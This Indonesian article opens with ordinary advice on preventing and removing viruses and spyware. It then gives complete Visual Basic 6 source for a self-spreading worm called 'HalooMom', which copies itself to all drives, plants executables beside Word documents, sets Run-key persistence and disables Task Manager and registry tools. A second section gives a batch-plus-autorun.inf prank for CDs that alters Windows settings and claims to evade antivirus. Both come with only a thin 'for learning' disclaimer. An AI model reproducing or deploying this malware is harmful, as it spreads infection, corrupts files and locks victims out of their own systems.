Tips dan Cara Mencegah, Memperbaiki Komputer dari Virus dan Spyware

Tahukah anda bahwa gangguan pada komputer tidak saja disebabkan oleh kerusakan atau kesalahan teknis pada piranti keras dan piranti lunak. Virus dan Spyware adalah gangguan pada komputer yang disebabkan oleh pihak eksternal dengan tujuan yang beragam seperti untuk mencuri data-data anda, merusak hardware anda, menghapus file, menghilangkan fungsi tertentu, mengambil alih kontrol pada komputer anda dan lain sebagainya. Yang pasti sangat langka atau mungkin tidak ada virus dan spyware yang membawa kuntungan pada komputer yang terinfeksi.

Virus dan spyware komputer bisa menyerang komputer anda baik yang sering online maupun yang tidak pernah online ke internet sekalipun. Komputer yang dihubungkan dengan disket atau usb flash disk pun bisa tertular dari software yang diinstall apabila tidak hati-hati. Jika telah terinfeksi suatu virus atau spyware yang hanya aktif bila komputer terhubung dengan internet, maka si virus atau spyware akan aktif ketika komputer sedang online.

Berikut ini adalah berbagai tindak pencegahan dan perbaikan pada komputer yang terkena virus atau spyware baik yang ringan maupun yang tingkat berat.

A. Pencegahan Agar Komputer Terhindar Virus dan Spyware

1. Hati-hati pada Attachment Email Anda
Jangan membuka file attachment pada email yang anda terima walaupun dari orang yang anda kenal jika attachment tersebut mengandung file program dengan extension atau akhiran .exe, .pif, .bat, dan lain sebagainya. Baca dengan teliti email yang dikirim, apakah gaya e-mail sama dengan yang biasa dikirim. Terkadang email yang anda terima berasal dari orang sunda, tapi menggunakan bahasa inggris, rusia, cina, dll pada emailnya.

2. Pasang / Install Software Keamanan Yang Terbaru
Pastikan komputer anda terinstall 3 jenis software keamanan utama dan terpasang dengan setting yang otomatis mengamankan komputer anda tanpa anda harus nyalakan terlebih dahulu. Mereka adalah anti virus untuk menangkal virus, anti spyware untuk menangkal spyware, dan firewall untuk menangkal serta memblokir serangan hacker serta koneksi dari luar. Untuk yang versi gratis dan bermutu bagus anda bisa menggunakan AVG antivirus untuk anti virus, Ad-Aware untuk antri spyware dan Zone Alarm untuk program firewall. Pastikan kesemuanya update / sudah terupdate dengan definition dan patch terbaru yang memperkecil peluang virus dan spyware varian baru melakukan infeksi pada komputer pc atau laptop anda. Jangan lupa pula untuk menjalankan scan pada komputer anda secara berkala untuk membunuh virus dan spyware yang baru menginfeksi.

3. Jangan Gegabah Menginstall Software
Hati-hati terhadap software yang anda isntall baik yang anda beli dari cd bajakan di toko-toko cd, dari download di internet, dari teman, dan lain sebagainya. Virus maupun spyware bisa saja bersembunyi pada program yang anda pasang tanpa anda sadari. Biasakanlah untuk membackup semua file penting anda secara berkala pada flash drive, cd atau dvd agar bila terjadi sesuatu hal yang fatal anda tidak akan kehilangan data anda.

4. Awasi User / Orang Lain Yang Memakai Komputer Anda
Jika komputer anda dipakai oleh orang lain, pastikan dia tidak melakukan hal-hal yang dapat merugikan komputer anda. Anda dapat membuat account khusus untuk tamu / guest dengan batasan-batasan tertentu yang anda dapat seting sendiri. Seseorang yang mungkin tidak anda duga bisa saja menginstall program, mencolokkan usb atau memasukkan disket yang mengandung virus atau spyware. Bahkan bisa juga memasang dengan sengaja software mata-mata untuk merekam segala aktifitas anda dan password yang biasa anda gunakan.

5. Waspada Selalu
Jika anda merasa bahwa ada sesuatu yang tidak beres pada komputer anda segera putuskan dan cabut sambungan ke koneksi internet ataupun jaringan network lan. Kemudian jalankan anti virus, anti spyware dan cek firewall apakah sudah berjalan dengan baik dan semestinya. Apabila anda mendapatkan pertanyaan untuk menginstall software dari situs yang tidak jelas tolaklah mentah-mentah. Ikuti perkembangan update patch atau tambalan lubang keamanan pada setiap software yang terpasang dan mendapatkan access internet pada program firewall anda.

B. Perbaikan Komputer Yang Terinfeksi Virus dan Spyware

1. Matikan Internet dan File Sharing Jaringan Network
Jika komputer anda terhubung dengan jaringan lokal atau internet segera putuskan dan cabut bila perlu untuk memastikan 100% anda benar-benar tidak terkoneksi. Terkadang virus dan spyware memanipulasi komputer anda sehingga seolah-olah anda sudah tidak terhubung lagi dengan jaringan luar.

2. Update dan Scan
Langkah pertama untuk perbaikan jika anda merasa ragu-ragu ataupun merasa yakin bahwa komputer anda terserang virs atau spyware adalah melakukan update. Update dapat dilakukan baik melalui download internet maupun secara offline jika anda memiliki filenya dari orang lain. Setelah terupdate dengan definition yang baru maka anda sebaiknya langsung melakukan scanning untuk segera menyingkirkan virus yang ditemukan.

3. Aktif Pada Komunitas Mailing List / Forum Tentang Keamanan Komputer
Semakin anda banyak bergabung dengan komunitas komputer, maka semakin banyak orang yang akan membantu anda jika anda sedang dalam masalah. Jangan takut dan ragu untuk menanyakan masalah yang anda hadapi biarpun masalah itu sepele. Gunakan nama samaran jika perlu. Di luar sana terdapat banyak orang yang mungkin pernah mengalami hal yang sama dengan anda. Di samping itu anda mungkin akan mendapatkan tips jalan pintas, solusi, saran, dan sebagainya dari komunitas tersebut. Biasanya virus dan spyware yang terbaru juga dibahas pada komunitas tersebut.

4. Format Harddisk Jika Tidak Ada Jalan Keluar
Jika semua cara telah anda jalani dan tidak ada yang memberikan solusi yang memuaskan anda dapat mengambil jalan pintas terakhir, yaitu dengan memformat ulang hard disk anda. Pastikan data yang penting bagi anda sudah ada cadangannya pada medium lain yang tidak terinfeksi virus, spywre serta program jahat lainnya. Kemudian format hard drive anda dan install os dan prgram aplikasi yang biasa anda pakai. Setelah semua ok, maka copy kembali file-file penting anda pada komputer yang fresh tersebut.

5. Belajar Dari Kesalahan
Buka mata anda ketika menghadapi suatu persoalan dan pelajari dengan baik, karena tidak menutup kemungkinan bahwa persoalan yang sama akan timbul dengan kuantitas yang lebih besar. Belajar tidak hanya dari masalah anda sendiri tetapi juga masalah orang lain bahkan yang anda tidak kenal sekali pun.

Membuat Virus HalooMom

Peringatan

Artikel ini hanya untuk pembelajaran saja, menyalah gunakan artikel ini bukan tanggung jawab penulis.

Sebelum menulis kode di bawah ini, pertama-tama program aplikasi Visual Basic 6 harus sudah terinstalasi di komputer Anda. Setelah itu buka project baru dan masukkan sebuah modul di dalam project Anda. Tapi ingat setelah Anda memberikan sebuah modul, hilangkan form1 Anda. Setelah itu pada Properties Project ganti startup aplikasi Anda dari Form1 ke Sub Main. Setelah itu ketik kode di bawah ini.

Code:
Private Declare Function GetDriveType Lib “kernel32″ _
Alias “GetDriveTypeA” (ByVal nDrive As String) As Long
Private Declare Function GetWindowsDirectory Lib “kernel32″ _
Alias “GetWindowsDirectoryA” (ByVal ipBuffer As String, ByVal nSize As Long) As Long

Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_SYSTEM = &H4
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Const FILE_ATTRIBUTE_COMPRESSED = &H800
Private Const MAX_PATH = 260

Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type

Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type

Private Declare Function FindFirstFile Lib “kernel32″ Alias “FindFirstFileA” _
(ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib “kernel32″ Alias “FindNextFileA” _
(ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib “kernel32″ (ByVal hFindFile As Long) As Long
Private Declare Function CopyFile Lib “kernel32″ Alias “CopyFileA” _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private pbMessage As Boolean

Private Function DriveType(Drive As String) As String
Dim sAns As String, lAns As Long
If Len(Drive) = 1 Then Drive = Drive & “:\”
If Len(Drive) = 2 And Right$(Drive, 1) = “:” Then Drive = Drive & “\”
lAns = GetDriveType(Drive)
Select Case lAns
Case 2
sAns = “Removable Drive”
Case 3
sAns = “Fixed Drive”
Case 4
sAns = “Remote Drive”
Case 5
sAns = “CD-ROM”
Case 6
sAns = “RAM Disk”
Case Else
sAns = “Drive Doesn’t Exist”
End Select
DriveType = sAns
End Function

Private Sub kodepengganda()
Dim ictr As Integer
Dim sDrive As String
Dim x As Byte
ReDim sDrives(0) As String
For ictr = 65 To 90
sDrive = Chr(ictr) & “:\”
If DriveType(sDrive) <> “Drive Doesn’t Exist” Then
On Error Resume Next
FileCopy App.Path & “\” & App.EXEName & “.exe”, sDrive & “HalooMom.exe”
End If
Next
End Sub

Private Sub kopikewindows()
Dim Buffer As String * 255
Dim x As Long
x = GetWindowsDirectory(Buffer, 255)
On Error Resume Next
FileCopy App.Path & “\” & App.EXEName & “.exe”, Left(Buffer, x) & “\Readme.exe”
End Sub

Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value
End Sub

Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value, “REG_DWORD”
End Sub

Sub kodepertahanan()
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue”, 2
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue”, 2
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1
Dim titik As String
titik = “”"”
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IKernel”, titik & “C:\Windows\Readme.exe” & titik
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HalooMom”, titik & “C:\HalooMom.exe” & titik
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption”, titik & “www.jombang-city.net” & titik
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext”, titik & “Ibu adalah orang yang melahirkan kita jadi jangan pernah durhaka kepadanya” & titik
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
End Sub

Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = “*.*”)
Screen.MousePointer = vbHourglass
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
fPath = AddBackSlash(Path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile “C:\Windows\Readme.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”, 1
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile “C:\Windows\Readme.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”, 1
End If
Wend
End If
If SubFolder Then
hFile = FindFirstFile(fPath & “*.*”, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
Screen.MousePointer = vbDefault
End Sub

Private Function StripNulls(f As String) As String
StripNulls = Left$(f, InStr(1, f, Chr$(0)) – 1)
End Function

Private Function AddBackSlash(S As String) As String
If Len(S) Then
If Right$(S, 1) <> “\” Then
AddBackSlash = S & “\”
Else
AddBackSlash = S
End If
Else
AddBackSlash = “\”
End If
End Function

Sub Manipulasi()
GetFiles “C:”, True, “*.DOC”
GetFiles “D:”, True, “*.DOC”
GetFiles “E:”, True, “*.DOC”
GetFiles “F:”, True, “*.DOC”
End Sub

Sub Main()
kodepengganda
kopikewindows
Manipulasi
kodepertahanan
Call Ulang
End Sub

Sub Ulang()
Call Main
End Sub

Buat Virus Sederhana dengan Notepad

virus ini efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

Catatan:

1. Ini hanya untuk pembelajaran saja

2. Kami tidak bertanggung jawab atas penyalah gunaan Artikel di atas

3. Selamat bersenang-senang